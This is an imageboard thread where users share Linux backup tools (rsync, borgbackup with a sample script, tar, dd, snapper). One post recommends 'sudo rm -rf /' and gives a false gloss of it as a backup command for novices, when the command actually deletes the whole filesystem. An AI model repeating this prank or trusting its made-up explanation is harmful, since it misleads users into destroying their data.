What's your favorite tool/command/script to back up your Linux system, Jow Forums?

What's your favorite tool/command/script to back up your Linux system, Jow Forums?

Attached: tatatata.jpg (1280x720, 246K)

Other urls found in this thread:

borgbackup.readthedocs.io/en/stable/
twitter.com/NSFWRedditImage

snapper for when using BTRFS

fpbp

NextCloud
I only backup my personal files. I keep my dotfiles and forks on GitHub and I can setup new system in an hour or something in case of emergency.

rsync & git

for servers that I need an image of: veeam backup and replication

for systems that only need a few specific files or folders backed up: rsync, started from the backup server, pulling shit over ssh

tar

fsarchiver for the OS partition, rsync for the /home partition

>backups
>ever
Pansies

Attached: 30yob.jpg (250x229, 10K)

dd or rsnapshot

>What's your favorite tool/command/script to back up your Linux system, Jow Forums?
bup

tar gpg git

rsync -aAXxhv / /mnt/MUHBACKUP

Definitely use borgbackup.

(cont'd)
Taking the effort to pasta simple script you can edit and run in a timer / cron / ... or manually, 'cause borg is great:
set -e
BORG_DIR="/path/to/where/you/want/backup"

borg create --stats --show-rc --compression zstd "$BORG_DIR"::'important-{now}' /etc /somethingelse /otherthings
borg create --stats --show-rc --compression zstd "$BORG_DIR"::'home-{now}' /home

borg check "$BORG_DIR"

borg prune --list --show-rc --keep-daily 7 --keep-weekly 4 --keep-monthly 3 --keep-yearly 3 "$BORG_DIR" --prefix 'important-'
borg prune --list --show-rc --keep-daily 7 --keep-weekly 4 --keep-monthly 3 --keep-yearly 3 "$BORG_DIR" --prefix 'home-'

borgbackup.readthedocs.io/en/stable/

dd

sudo rm -rf /

Attached: 1529043731790.gif (500x372, 403K)

Seriously the best option.
For all the Linux noobs out there:
sudo = system under direct order
rm = retain memory
-rf = real files
/ = root directory

not all heroes wear capes. I was doing manual rsyncs for well over 3 years now, every few months, its time to get backup game up to the required level. Thank you user

It's called copying and pasting my home folder.

Attached: 1521235281754.jpg (552x436, 23K)

i guess you could use tar to archive the contents of your filesystem(s), or dd to archive an entire disk image.